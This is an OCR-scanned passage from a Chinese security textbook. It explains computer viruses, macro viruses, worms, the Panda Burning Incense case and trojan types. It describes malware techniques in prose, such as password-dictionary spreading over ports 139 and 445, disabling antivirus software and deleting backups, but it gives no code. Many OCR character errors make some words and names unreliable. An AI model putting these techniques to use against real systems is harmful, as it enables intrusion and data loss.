(7) 文件 奇怪 地 消失 ,或 被 修改 ,或 用 户 不 可 以 删除 文件 。 

(8) Word 或 Excel 提示 执行 “ 安 ”。 

(9) 网 络 主机 信息 与 参数 被 修改 ,不 能 连接 到 网 络 。 用 户 连 接 网 络 时 ,莫名 其 妙 地 连接 
到 其 他 站 点 ,一 般 钓 鱼网 站 病毒 与 ARP 病毒 会 产生 此 类 现象 。 

(10) 杀毒 软件 被 自动 关闭 或 不 能 使 用 。 

当然 ,通过 计算 机 杀毒 软件 的 病毒 防火 墙 和 实时 检测 ,用 户 一 般 可 以 发 现 病毒 的 存在 ， 
但 对 一 些 杀 毒 软件 不 能 及 时 发 现 的 新 病毒 ,通过 观察 病毒 现象 还 是 很 有 用 处 的 。 


4.3.2 计算 机 病毒 的 特征 


计算 机 病毒 的 特征 主要 有 传染 性 、 隐 蔽 性 、 潜 伏 性 、 触 发 性 、 破 坏 性 和 不 可 预见 性 。 

(1) 传染 性 。 计 算 机 病毒 会 通过 各 种 媒介 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 
机 。 这 些 媒介 可 以 是 程序 ,文件 .存储 介质 、 网 络 等 。 

(2) 隐蔽 性 。 不 经 过 程序 代码 分 析 或 计算 机 病毒 代码 扫描 ,计算 机 病毒 程序 与 正常 程 
序 是 不 容易 区 分 的 。 在 没有 防护 措施 的 情况 下 ,计算 机 病毒 程序 一 经 运行 并 取得 系统 控制 
权 后 ,可 以 迅速 感染 给 其 他 程序 ,而 在 此 过 程 中 屏幕 上 可 能 没有 任何 异常 显示 。 这 种 现象 就 
是 计算 机 病毒 传染 的 隐蔽 性 。 

(3) 潜伏 性 。 病 毒 具 有 依附 其 他 媒介 寄生 的 能 力 , 它 可 以 在 磁盘 .光盘 或 其 他 介质 上 洪 
伏 几 天 ,甚至 几 年 。 不 满足 其 触发 条 件 时 ,除了 感染 其 他 文件 以 外 不 做 破坏 ;触发 条 件 一 旦 
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得 到 满足 ,病毒 就 四 处 繁殖 扩散 、 破 坏 。 

(4) 触发 性 。 计 算 机 病毒 发 作 往 往 需 要 一 个 触发 条 件 , 其 可 能 利用 计算 机 系统 时 钟 、 病 
毒 体 自 带 计 数 器 .计算 机 内 执行 的 某 些 特定 操作 等 。 如 CIH 病毒 在 每 年 4 月 26 日 发 作 , 而 
一 些 邮件 病毒 在 打开 附件 时 发 作 。 

(5) 破坏 性 。 当 触发 条 件 满足 时 ,病毒 在 被 感染 的 计算 机 上 开始 改作。 根据 计算 机 病 
毒 的 危害 性 不 同 ,病毒 发 作 时 表现 出 来 的 症状 和 破坏 性 可 能 有 很 大 差别 。 从 显示 一 些 令 人 
讨厌 的 信息 ,到 降低 系统 性 能 、 破 坏 数 据 ( 信 息 ) ,直到 永久 性 摧毁 计算 机 硬件 和 软件 ,造成 系 


统 骨 省 、 网 络 瘫痪 等 。 
(6) 不 可 预见 性 。 病 毒 相对 于 杀毒 软件 永远 是 超前 的 ,从 理论 上 讲 , 没 有 任何 杀毒 软件 
可 以 杀 除 所 有 的 病毒 。 


为 了 达到 保护 自己 的 目的 ,计算 机 病毒 作者 在 编写 病毒 程序 时 ,一般 都 采用 一 些 特殊 的 
编程 技术 ,例如 : 

(1) 自 加 密 技 术 。 就 是 为 了 防止 被 计算 机 病毒 检测 程序 扫描 出 来 ,并 被 轻易 地 反 汇 编 。 
计算 机 病毒 使 用 了 加 密 技 术 后 ,对 分 析 和 破译 计算 机 病毒 的 代码 及 清除 计算 机 病毒 等 工作 
都 增加 了 很 多 困难 。 

(2) 采用 变形 技术 。 当 某 些 计算 机 病毒 编制 者 通过 修改 某 种 已 知 计算 机 病毒 的 代码 ， 
使 其 能 够 躲 过 现 有 计算 机 病毒 检测 程序 时 , 称 这 种 新 出 现 的 计算 机 病毒 是 原来 被 修改 前 计 
算 机 病毒 的 变形 。 当 这 种 变形 了 的 计算 机 病毒 继承 了 原 父 本 计算 机 病毒 的 主要 特征 时 ,就 
称 为 是 其 父 本 计算 机 病毒 的 一 个 变种 。 

(3) 对 抗 计 算 机 病毒 防范 系统 。 计 算 机 病毒 采用 对 抗 计算 机 病毒 防范 系统 技术 时 , 当 
发 现 磁 盘 上 有 某 些 著名 的 计算 机 病毒 杀毒 软件 或 在 文件 中 查找 到 出 版 这 些 软件 的 公司 名 称 
时 ,就 会 删除 这 些 杀 毒 软件 或 文件 ,造成 杀毒 软件 失效 ,甚至 引起 计算 机 系统 崩溃 。 

(4) 反 跟 踪 技 术 。 计 算 机 病毒 采用 反 跟 踪 措 施 的 目的 是 要 提高 计算 机 病毒 程序 的 防 破 
译 能 力 和 伪装 能 力 。 常 规程 序 使 用 的 反 跟踪 技术 在 计算 机 病毒 程序 中 都 可 以 利用 。 


4.3.3 计算 机 病毒 的 分 类 


尽管 计算 机 病毒 的 数量 非常 多 .表现 形式 也 多 种 多 样 , 而 且 .病毒 的 数量 仍 在 不 断 增加 ， 
但 根据 一 定 的 标准 可 以 把 它们 分 成 几 种 类 型 ,因此 .同一 种 病毒 可 能 是 不 同类 型 的 病毒 。 

1. 按 病毒 存在 的 媒体 分 

根据 病毒 存在 的 媒体 分 ,病毒 可 以 划分 为 网 络 病毒 ,文件 型 病毒 .引导 型 病毒 。 网 络 
病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ,文件 型 病毒 感染 计算 机 中 的 文件 
(如 . com、. exe 和 . bat 文件 等 ) ,引导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 主 引 导 记 录 
(MBR). 

还 有 这 三 种 情况 的 混合 型 ,例如 : 多 型 病毒 (文件 型 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 
种 目标 ,这 样 的 病毒 通常 都 具有 复杂 的 算法 ,它们 使 用 非常 规 的 办 法 侵入 系统 ,同时 使 用 了 
加 密 和 变形 算法 。 目 前 很 多 病毒 都 是 这 种 混合 类 型 的 ,一 旦 中 毒 就 很 难 删除 。 病 毒 在 感染 
系统 之 后 ,会 在 多 处 建立 自我 保护 功能 ,比如 注册 表 、 进 程 、 系 统 启动 项 等 位 置 。 如 果 进 行 手 
动 清除 ,在 注册 表 中 找到 病毒 对 应 项 ,删除 后 进程 一 旦 检测 出 来 ,会 重新 写 和 人 注册 表 。 而 在 
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进程 中 ,病毒 也 不 是 单一 地 建立 一 个 进程 ,而 一 般 是 两 个 或 多 个 进程 ,同时 这 些 病毒 进程 之 
间 互 为 守护 进程 , 即 关 掉 一 个 ,另外 的 进程 会 马上 检测 到 ,并 新 建 一 个 刚 被 删除 的 进程 。 

2. 按 病毒 传染 的 方法 分 

根据 病毒 传染 的 方法 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病毒 感染 计算 机 后 ， 
把 自身 的 内 存 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系 统 调用 并 合并 到 操作 系统 
中 去 , 它 处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 
计算 机 内 存 , 一 些 病毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 病毒 也 
被 划分 为 非 驻 留 型 病毒 。 

3. 按 病毒 破坏 的 能 力 分 

按 病 毒 破坏 的 能 力 大 小 ,可 分 为 无 害 型 .无 危险 型 .危险 型 和 非常 危险 型 。 

(1) 无 害 型 。 除 了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

(2) 无 危险 型 。 这 类 病毒 仅仅 是 减少 内 存 、 显 示 图 像 、 发 出 声音 及 同类 音响 。 

(3) 危险 型 。 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 。 这 类 病毒 删除 程序 破坏 数 据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 的 
信息 。 

4. 按 病毒 链接 的 方式 分 

由 于 病毒 本 身 必 须 有 一 个 攻击 对 象 以 实现 对 计算 机 系统 的 攻击 ,病毒 所 攻击 的 对 象 是 
计算 机 系统 可 执行 的 部 分 。 因 此 , 按 病 毒 链 接 的 方式 可 以 将 病毒 分 为 以 下 几 类 。 

(1) 源码 型 病毒 。 该 病毒 攻击 高 级 语言 编写 的 程序 ,该 病毒 在 高 级 语言 所 编写 的 程序 
编译 前 插入 到 源 程序 中 ,经 编译 成 为 合法 程序 的 一 部 分 。 

(2) 嵌入 型 病毒 。 这 种 病毒 是 将 自身 嵌入 到 现 有 程序 中 ,把 病毒 的 主体 程序 与 其 攻击 
的 对 象 以 插入 的 方式 链接 。 这 种 病毒 是 难以 编写 的 ,一 旦 侵入 程序 体 后 也 较 难 消除 。 

(3) 外 壳 型 病毒 。 该 病毒 将 其 自身 包围 在 主 程序 的 四 周 ,对 原来 的 程序 不 做 修改 。 这 
种 病毒 最 为 常见 ,易于 编写 ,也 易于 发 现 , 一 般 测试 文件 的 大 小 即 可 知道 。 

(4) 操作 系统 型 病毒 。 这 种 病毒 用 它 自 己 的 程序 意图 加 入 或 取代 部 分 操作 系统 的 程序 
模块 进行 工作 ,具有 很 强 的 破坏 性 ,可 以 导致 整个 系统 的 瘫痪 。 

5. 按 病毒 激活 的 时 间 分 

(1) 定时 型 病毒 。 定 时 型 病毒 是 在 某 一 特定 时 间 才 发 作 的 病毒 , 它 以 时 间 为 发 作 的 触 
发 条 件 ,如 果 时 间 不 满足 ,此 类 病毒 将 不 会 进行 破坏 活动 。 

(2) 随机 型 病毒 。 与 定时 型 病毒 不 同 的 是 随机 型 病毒 ,此 类 病毒 不 是 通过 时 间 进 行 触 
发 的 。 





4.3.4 安 病 毒 和 蠕虫 病毒 


1. 宏 病 毒 

宏 (Macro) 是 Microsoft 公司 为 其 Office 软件 包 设计 的 一 项 特殊 功能 ,Microsoft 公司 
设计 它 的 目的 是 让 人 们 在 使 用 Office 软件 进行 工作 时 避免 一 再 地 重复 相同 的 动作 。 利 用 
简单 的 语法 ,把 常用 的 动作 写成 宏 ,在 工作 时 ,可 以 直接 利用 事先 编写 好 的 宏 自 动 运行 ,完成 
某 项 特定 的 任务 ,而 不 必 再 重复 相同 的 动作 ,让 用 户 文档 中 的 一 些 任务 自动 化 。 
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使 用 Word 软件 时 ,通用 模板 (Normal. dot) 里面 就 包含 了 基本 的 宏 , 因 此 当 使 用 该 模板 
时 ,Word 为 用 户 设 定 了 很 多 基本 的 格式 。 宏 病毒 是 用 Visual Basic 语言 编写 的 ,这 些 宏 病 
毒 不 是 为 了 方便 人 们 的 工作 而 设计 的 ,而 是 用 来 对 系统 进行 破坏 的 。 当 含有 这 些 宏 病毒 的 
文档 被 打开 时 ,里 面 的 宏 病毒 就 会 被 激活 ,并 能 通过 DOC 文档 及 DOT 模板 进行 自我 复制 
及 传播 。 

以 往 病毒 只 感染 程序 ,不 感染 数据 文件 ,而 宏 病 毒 专门 感染 数据 文件 ,彻底 改变 了 “数据 
文件 不 会 传播 病毒 ”的 错误 认识 。 宏 病毒 会 感染 Office 的 文档 及 其 模板 文件 。 

对 宏 病 毒 进行 防范 可 以 采取 以 下 几 项 措施 。 

(1) 提高 宏 的 安全 级 别 。 目 前 ,高 版 本 的 Word 软件 可 以 设置 宏 的 安全 级 别 , 在 不 影响 
正常 使 用 的 情况 下 ,应 该 选择 较 高 的 安全 级 别 。 

(2) 删除 不 知 来 路 的 宏 定义 。 

(3) 将 Normal. dot 模板 进行 备份 , 当 被 病毒 感染 后 ,使 用 备份 模板 进行 覆盖 。 

如 果 怀 疑 外 来 文件 含有 宏 病 毒 ,可 以 使 用 写字 板 软 件 打 开 该 文件 ,然后 将 文本 粘贴 到 
Word 文档 中 ,转换 后 的 文档 是 不 会 含有 宏 病 毒 的 。 

2. 蠕虫 病毒 

1) 蠕虫 病毒 的 概念 

蠕虫 (Worm) 病 毒 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 病毒 的 一 些 共性 ,如 传播 
性 、 隐 项 性 破坏 性 等 ,同时 具有 自己 的 一 些 特 征 , 如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 
中 ) ,对 网 络 造成 拒绝 服务 ,以 及 和 黑客 技术 相 结合 。 在 产生 的 破坏 性 上 ,蠕虫 病毒 也 不 是 普 
通病 毒 所 能 比拟 的 ,网 络 的 发 展 使 得 蠕虫 可 以 在 短 时 间 内 草 延 整个 网 络 ,造成 网 络 瘫痪 。 

根据 使 用 者 情况 ,可 将 蠕虫 病毒 分 为 两 类 ,一 类 是 面向 企业 用 户 和 局 域 网 的 ,这 类 病毒 
利用 系统 漏洞 ,主动 进行 攻击 .可 以 对 整个 Internet 可 造成 瘫痪 性 的 后 果 , 如 * 尼 姆 达 ”“SQL 
蠕虫 王 “ 冲 击 波 ” 等 。 另 外 一 类 是 针对 个 人 用 户 的 ,通过 网 络 ( 主 要 是 电子 邮件 ,恶意 网 页 形 
式 ) 迅 速 传播 ,以 受 虫 病毒 ,求职 信 病 毒 为 代表 。 在 这 两 类 里 虫 病毒 中 ,第 一 类 具有 很 大 的 主 
动 攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 。 第 二 类 病毒 的 传播 方式 比较 复杂 、 多 样 ,少数 利用 
了 Microsoft 应 用 程序 的 漏洞 ,更 多 的 是 利用 社会 工程 学 对 用 户 进行 欺骗 和 诱 使 ,这 样 的 病 
毒 造 成 的 损失 是 非常 大 的 ,同时 也 是 很 难 根除 的 ,比如 求职 信 病 毒 ,在 2001 年 就 已 经 被 各 大 
杀毒 厂商 发 现 , 但 直到 2002 年 年 底 依然 排 在 病毒 危害 排行 榜 的 首位 。 

2) 蠕虫 病毒 与 一 般 病 毒 的 区 别 

蠕虫 一 般 不 采取 利用 PE(portable executable) 格 式 插入 文件 的 方法 ,而 是 复制 自身 在 
Internet 环境 下 进行 传播 。 病 毒 的 传染 能 力主 要 是 针对 计算 机 内 的 文件 系统 而 言 ,而 蠕虫 
病毒 的 传染 目标 是 Internet 上 的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 、 电 子 邮 件 、 网 络 
中 的 恶意 网 页 .大量 存在 着 漏洞 的 服务 器 等 都 成 为 蠕虫 传播 的 良好 途径 。 网 络 的 发 展 也 使 
得 蠕虫 病毒 可 以 在 几 个 小 时 内 草 延 全 球 , 而 且 蠕虫 的 主动 攻击 性 和 突然 爆发 性 将 使 得 人 们 
手足 无 措 。 蠕 虫 病毒 与 一 般 病毒 的 比较 如 表 4-1 所 示 。 

3)“ 熊 猫 烧 香 ” 病 毒 实例 

2006 年 年 底 ,“ 能 猫 烧香 ”病毒 在 我 国 Internet 上 大 规模 爆发 ,由 于 该 病毒 传播 手段 极 
为 全 面 ,并 且 变 种 频繁 更 新 ,让 用 户 和 杀毒 厂商 防不胜防 ,被 列 为 2006 年 十 大 病毒 之 首 。 
“熊猫 烧香 ”病毒 是 一 种 蠕虫 病毒 ( 尼 姆 达 ) 的 变种 ,而 且 是 经 过 多 次 变种 而 来 的 。 由 于 中 毒 
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计算 机 的 可 执行 文件 会 出 现 “ 熊 猫 烧 香 ” 图 案 , 所 以 被 称 为 “熊猫 烧香 ”病毒 。 “熊猫 烧 香 ” 
ij 毒 是 用 Delphi 语言 编写 的 ,这 是 一 个 有 黑客 性 质感 染 型 的 蠕虫 病毒 ( 即 蠕虫 十 木马 ) 。 

2007 年 2 月 “熊猫 烧香 "病毒 设计 者 李 俊 归 案 , 交 出 杀 病毒 软件 。2007 年 9 月 ,湖北 省 仙桃 

















市 法 院 一 审 以 破坏 计算 机 信息 系统 罪 判 处 李 俊 有 期 徒刑 4 年 。 
表 4-1 蠕虫 病毒 与 一 般 病毒 的 比较 
项 目 蠕虫 病毒 一 般 病毒 
存在 形式 独立 存在 寄存 文件 
传染 机 制 主动 攻击 宿主 文件 运行 
传染 目标 网 络 文件 











1) 感染 “熊猫 烧香 "病毒 的 症状 

(1) 关闭 众多 杀毒 软件 和 安全 工具 。 

(2) 感染 所 有 . exe、. scrR、. pifF、. com 文件 ,并 更 改 图 标 为 烧香 熊猫 ,如 图 4-4 所 示 。 
tdcomx wshomomx actmovie.exe append.exe arp.exe atexe atmadm.exe 
attrib,exe sutochk.exe autoconv.exe sutofmt,exe sutolfn.exe boctok,exe bootvrfy,exe 


图 4-4 感染 “熊猫 烧香 ”病毒 的 症状 


(3) 循环 遍历 磁盘 ,感染 文件 ,对 关键 系统 文件 跳 过 ,不 感染 Windows 媒体 播放 器 、 
MSN IE 等 程序 。 在 硬盘 各 个 分 区 中 生成 文件 autorun. inf 和 setup. exe。 

(4) 感染 所 有 . htm、. html、. asp、. php、. jsp、. aspx 文件 ,添加 木马 恶意 代码 ,导致 用 户 
一 打开 这 些 网 页 文件 ,IE 就 会 自动 链接 到 指定 的 病毒 网 址 中 下 载 病毒 。 

(5) 自动 删除 * . gho 文件 ,使 用 户 的 系统 备份 文件 丢失 。 

(6) 病毒 攻击 计算 机 弱 口 令 以 及 利用 微软 自动 播放 功能 。 

(7) 计算 机 会 出 现 蓝屏 .频繁 重新 启动 等 情形 。 

2)“ 熊 猫 烧 香 "病毒 的 传播 途径 

(1) 通过 U 盘 和 移动 硬盘 进行 传播 。 

(2) 通过 局 域 网 共享 文件 夹 、 系 统 弱 口令 等 传播 , 当 病 毒 发 现 能 成 功 链接 攻击 目标 的 
139 端口 或 445 端口 后 ,将 使 用 内 置 的 一 个 用 户 列表 及 密码 字典 进行 连接 (还 可 猜测 被 攻击 
端的 密码 ) 。 当 成 功 地 连接 上 以 后 ,将 自己 复制 过 去 并 利用 计划 任务 启动 激活 病毒 。 

(3) 通过 网 页 传播 。 

3)“ 熊 猫 烧 香 "病毒 所 造成 的 破坏 

(1) 关闭 众多 杀毒 软件 。 

(2) 每 隔 1 秒 寻找 桌面 窗口 ,并 关闭 窗口 标题 中 含有 以 下 字符 的 程序 ，QQKav、 
QQAV .防火 墙 .进程 VirusScan、 网 镖 、 杀 毒 、 毒 霸 、 瑞 星 、 江 民 、 超 级 兔子 \ 优 化 大 师 、 木 马克 
星 ,注册 表 编 辑 器 、 卡 巴 斯 基 反 病 毒 、.Symantec AntiVirus、Duba*…… 

(3) 修改 注册 表 。 修 改 注册 表 ,使 得 病毒 能 自 启动 、 删 除 安全 软件 在 注册 表 中 的 键 值 、 
不 显示 隐藏 文件 ,删除 相关 安全 服务 等 。 
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(4) 下 载 病毒 文件 。 每 隔 10 秒 , 下 载 病毒 制作 者 指定 的 文件 ,并 用 命令 行 检 查 系统 中 
是 否 存在 共享 ,如 果 共 享 存在 就 运行 net share 命令 关闭 admin $ 共享 。 


4.3.5 木马 


木马 是 一 种 目的 非常 明确 的 有 害 程序 ,通常 会 通过 伪装 吸引 用 户 下 载 并 执行 。 一 旦 用 
户 触发 了 木马 程序 (俗称 种 马 ) ,被 种 马 的 计算 机 就 会 为 施 种 木马 者 提供 一 条 通道 ,使 施 种 者 
可 以 任意 毁坏 .窃取 被 种 者 的 文件 .密码 等 ,甚至 远程 操控 被 种 者 的 计算 机 。 

木马 全 称 “ 特 洛 伊 木马 ”, 英 文 名 称 为 Trojan Horse, 据 说 这 个 名 称 来 源 于 希腊 神话 《 木 
马 屠 城 记 》。 古 希腊 大 军 围攻 特洛伊 城 ,久久 无 法 攻 下 。 于 是 有 人 献计 制造 一 只 高 二 丈 的 大 
木马 ,假装 作战 马 神 ,让 士兵 藏匿 于 巨大 的 木马 中 ,大 部 队 假 装 撤退 而 将 木马 按 弃 于 特洛伊 
城下 。 城 中 得 知 解围 的 消息 后 , 遂 将 “木马 ”作为 奇异 的 战利品 拖 入 城内 ,全 城 饮酒 狂欢 。 到 
午夜 时 分 ,全 城 军民 尽 入 梦乡 ,藏匿 于 木马 中 的 将 士 打开 秘 门 游 强 而 下 ,开启 城 门 及 四 处 纵 
火 , 城 外 伏兵 涌 入 ,部 队 里 应 外 合 , 禁 层 特洛伊 城 。 后 世 称 这 只 大 木马 为 “特洛伊 木马 ”, 如 今 
黑客 程序 借用 其 名 ,有 "一 经 潜入 ,后 患 无 穷 ”之 意 。 

木马 程序 通常 会 设法 隐藏 自己 ,以 骗取 用 户 的 信任 。 木 马 程序 对 用 户 的 威胁 越 来 越 大 ， 
尤其 是 一 些 木马 程序 采用 了 极其 特殊 的 手段 来 隐藏 自己 ,使 普通 用 户 很 难 在 中 毒 后 发 觉 。 

1. 服务 端 和 客户 端 

木马 通常 有 两 个 可 执行 程序 : 一 个 是 客户 端 , 即 控制 端 ; 另 一 个 是 服务 端 , 即 被 控制 端 。 
黑客 们 将 服务 端 成 功 植 人 用 户 的 计算 机 后 ,就 有 可 能 通过 客户 端 * 进 入 ”用户 的 计算 机 。 被 
植 人 木马 服务 端的 计算 机 常 称 被 “种 马 ”, 也 俗称 为 “中 马 ”。 用 户 一 旦 运行 了 被 种 植 在 计算 
机 中 的 木马 服务 端 , 就 会 有 一 个 或 几 个 端口 被 打开 ,使 黑客 有 可 能 利用 这 些 打开 的 端口 进入 
计算 机 系统 ,安全 和 个 人 隐私 也 就 全 无 保障 了 。 木 马 服务 端 一旦 运行 并 被 控制 端 连接 ,其 控 
制 端 将 享有 服务 端的 大 部 分 操作 权限 ,例如 给 计算 机 增加 口令 ,浏览 移动、 复制 .删除 文件 ， 
修改 注册 表 , 更 改 计 算 机 配置 等 。 由 于 运行 了 木马 服务 端的 计算 机 完全 被 客户 端 控 制 , 任 由 
黑客 宰割 ,所 以 ,运行 了 木马 服务 端的 计算 机 也 常 被 人 戏称 为 * 肉 机 ”。 

2. 木马 程序 的 基本 特征 

虽然 木马 的 种 类 繁多 ,而 且 功 能 各 异 . 大 都 有 自己 特定 的 目的 。 但 综合 现在 流行 的 木 
马 ,它们 都 有 以 下 基本 特征 。 

(1) 隐蔽 性 。 隐 项 性 是 木马 的 首要 特征 。 要 让 远方 的 客户 端 能 成 功 入侵 被 种 马 的 计算 
机 ,服务 端 必须 有 效 地 隐藏 在 系统 之 中 。 隐 藏 的 目的 一 是 诱惑 用 户 运 行 服 务 端 ;二 是 防止 用 
户 发 现 被 木马 感染 。 

除了 可 以 在 任务 栏 中 隐藏 在 任务 管理 器 中 隐藏 外 ,木马 为 了 隐藏 自己 ,通常 还 会 不 产 
生 程 序 图 标 或 产生 一 些 让 用 户 错觉 的 图 标 。 如 将 木马 程序 的 图 标 修改 为 文件 夹 图 标 或 文本 
文件 图 标 后 ,由 于 系统 默认 是 “隐藏 已 知 文件 类 型 的 扩展 名 ”, 用 户 就 有 可 能 将 其 误 认为 是 文 
件 夹 或 文本 文件 。 

(2) 自动 运行 性 。 木 马 除 会 诱惑 用 户 运 行 外 ,通常 还 会 自 启动 , 即 当 用 户 的 系统 启动 时 
自动 运行 木马 程序 。 因 此 ,木马 通常 会 潜伏 在 用 户 的 启动 配置 文件 中 ,如 win. ini、system. ini、 
winstart. bat、\ 注 册 表 以 及 启动 组 中 。 
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(3) 欺骗 性 。 木 马 程序 为 了 达到 长 期 潜伏 的 目的 ,常会 使 用 与 系统 文件 相同 或 相近 的 
文件 名 ,以 explorer. exe(Windows 资源 管理 器 ) 为 例 , 这 是 一 个 非常 重要 的 系统 文件 ,正确 
的 位 置 为 C:\Windows\explorer. exe。 不 少 木 马 和 病毒 都 在 这 个 文件 上 做 文章 ,如 将 木马 
文件 置 于 其 他 文件 夹 中 并 命名 为 explorer. exe, 或 将 木马 文件 命名 为 explorer. exe( 将 字 
母 *1” 用 数字 “1” 代 替 ) 或 explOrer. exe (将 字母 “o” 用 数字 “0” 代 替 ), 并 将 其 存放 在 
C:\Windows 中 ,这 样 的 山寨 资源 管理 器 很 难 被 用 户 识别 。 总 之 ,木马 作者 在 研究 木马 技术 
的 同时 ,也 在 不 断 地 创新 欺骗 技术 ,现在 的 木马 可 以 说 是 越 来 越 隐蔽 。 

(4) 能 自动 打开 特定 的 端口 。 和 一 般 的 病毒 不 同 ,木马 程序 潜入 用 户 的 计算 机 主要 目 
的 不 是 为 了 破坏 系统 ,而 是 为 了 获取 系统 中 的 有 用 信息 。 正 因为 如 此 ,木马 程序 通常 会 自动 
打开 系统 特定 的 端口 ,以便 能 和 客户 端 进行 通信 。 

(5) 功能 的 特殊 性 。 木 马 通常 都 具有 特定 的 目的 ,其 功能 也 就 有 特殊 性 。 以 盗号 类 的 
木马 为 例 ,除了 能 对 用 户 的 文件 进行 操作 之 外 ,还 会 搜索 cache 中 的 口令 .记录 用 户 键盘 的 
操作 等 。 

3. 木马 程序 功能 

木马 程序 由 服务 端 和 客户 端 两 部 分 组 成 ,所 以 木马 程序 是 典型 的 Client/Server( 客 户 
机 /服务 器 ,C/S) 结 构 的 程序 。 木 马 程序 的 主要 功能 是 进行 远程 控制 ,黑客 使 用 客户 端 程序 
远程 控制 被 植 人 服务 端的 计算 机 ,对 * 肉 机 ?进行 远程 监控 、 盗 取 系统 中 的 密码 信息 和 其 他 有 
用 资料 、 对 “ 肉 机 ”进行 远程 控制 等 。 

既然 木马 具有 远程 控制 功能 ,那么 木马 和 一 般 远程 控制 软件 有 何 区 别 呢 ? 首先, 应 该 说 
明 的 是 ,早期 的 部 分 木马 ,本 是 不 错 的 远程 控制 软件 ,但 被 一 些 居心 不 良 者 用 于 非法 用 途 , 如 
冰河 、 灰 饮 子 等 。 以 灰 鸟 子 为 例 ,本 是 一 款 非常 优秀 的 远程 控制 软件 ,除了 支持 正 向 连接 外 ， 
还 支持 反 向 连接 , 即 客户 端 可 以 自动 请 求 服务 端 连接 ,还 有 完善 的 摄像 头 控 制 功能 。 但 很 快 
就 被 不 法 之 徒 利 用 ,很 多 网 络 用 户 被 人 非法 安装 了 灰 蚀 子 服务 端 程序 , 灰 鸟 子 自然 也 就 成 了 
黑客 的 “帮凶 ”, 晓 变 成 了 一 款 攻击 性 极 强 的 木马 程序 。 正 因为 如 此 , 灰 铝 子 自然 也 就 成 了 各 
反 病 毒 软件 全 力 围 巢 的 对 象 。 在 这 样 的 一 种 环境 下 , 灰 蚀 子 工 作 室 主动 发 布 了 服务 端 印 载 
程序 ,使 得 灰 蚀 子 是 远程 控制 程序 还 是 木马 之 争 终于 告 一 段落 。 

从 上 面 的 例子 也 可 以 看 出 ,有 部 分 软件 ,正确 使 用 会 是 优秀 的 远程 控制 软件 ,用 于 非法 
用 途 就 成 了 “木马 ”。 不 过 ,这 种 情况 目前 已 不 多 见 , 目 前 大 部 分 木马 是 绝对 “正宗 ”的 木马 ， 
纯粹 以 非法 获取 用 户 信息 为 目的 。 

现在 ,区 分 一 个 程序 是 木马 还 是 远程 控制 软件 ,主要 依据 是 看 它 的 服务 端 是 否 隐藏 , 木 
马 会 想方设法 隐藏 其 服务 端 软 件 , 而 远程 控制 软件 则 不 会 隐藏 。 

4. 木马 的 分 类 

常见 的 木马 主要 可 以 分 为 以 下 9 大 类 。 

(1) 破坏 型 木马 。 这 种 木马 唯一 的 功能 就 是 破坏 并 删除 文件 ,它们 能 够 删除 目标 机 上 
的 DLL INI .EXE 文件 ,计算 机 一 旦 被 感染 ,其 安全 性 就 会 受到 严重 威胁 。 

(2) 密码 发 送 型 木马 。 这 种 木马 可 以 找到 目标 机 的 隐藏 密码 ,在 受害 者 不 知道 的 情况 
下 ,把 它们 发 送 到 指定 的 邮箱 。 有 人 喜欢 把 自己 的 各 种 密码 以 文件 的 形式 存放 在 计算 机 中 ， 
认为 这 样 方便 ;还 有 人 喜欢 用 Windows 提供 的 密码 记忆 功能 ,这 样 就 可 以 不 必 每 次 都 输入 
密码 了 。 这 类 木马 恰恰 是 利用 这 一 点 获取 目标 机 的 密码 ,它们 大 多 数 会 在 每 次 启动 
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Windows 时 重新 运行 ,而 且 大 多 使 用 25 号 端口 发 送 E-mail。 

(3) 远程 访问 型 木马 。 这 种 木马 是 使 用 最 广泛 的 木马 , 它 可 以 远程 访问 被 攻击 者 的 硬 
盘 。 只 要 有 人 运行 了 服务 端 程序 ,客户 端 通过 扫 措 等 手段 知道 了 服务 端的 IP 地 址 ,就 可 以 
实现 远程 控制 。 当 然 ,这 种 远程 控制 也 可 以 用 于 教师 监控 学 生 在 机 器 上 的 所 有 操作 。 远 程 
访问 木马 会 在 目标 机 上 打开 一 个 端口 ,而且 有 些 木 马 还 可 以 改变 端口 .设置 连接 密码 等 ,为 
的 是 只 有 黑客 自己 来 控制 这 个 木马 。 因 此 ,用 户 经 常 改变 端口 的 选项 是 非常 重要 的 ,只 有 改 
变 了 端口 才 会 有 更 大 的 隐蔽 性 。 

(4) 键盘 记录 型 木马 。 这 种 木马 可 以 随 着 Windows 的 启动 而 启动 ,记录 受害 者 的 键盘 
项 击 并 且 在 LOG 文件 里 查找 密码 。 它 们 有 在 线 和 离线 记录 两 种 选项 ,可 以 分 别 记 录用 户 
在 线 和 离线 状态 下 项 击 键盘 时 的 按键 情况 ,也 就 是 说 在 目标 计算 机 上 按 过 什么 按键 ,黑客 可 
以 从 记录 中 知道 ,并 从 中 找 出 密码 信息 ,甚至 是 信用 卡 账号 。 这 种 类 型 的 木马 ,很 多 都 具有 
邮件 发 送 功能 ,木马 找到 需要 的 密码 后 ,将 自动 把 密码 发 送 到 黑客 指定 的 邮箱 。 

(5) DoS 攻击 型 木马 。 随 着 DoS( 拒 绝 服务 ) 攻 击 的 增多 ,被 用 于 DoS 攻击 的 木马 也 越 
来 越 多 。 当 黑客 人 侵 一 台 机 器 后 ,为 其 种 上 DoS 攻击 木马 ,那么 日 后 这 台 计 算 机 就 成 为 黑 
客 DoS 攻击 的 最 得 力 助手 。 黑 客 控 制 的 “肉鸡 ”数量 越 多 ,发动 DoS 攻击 取得 成 功 的 概率 就 
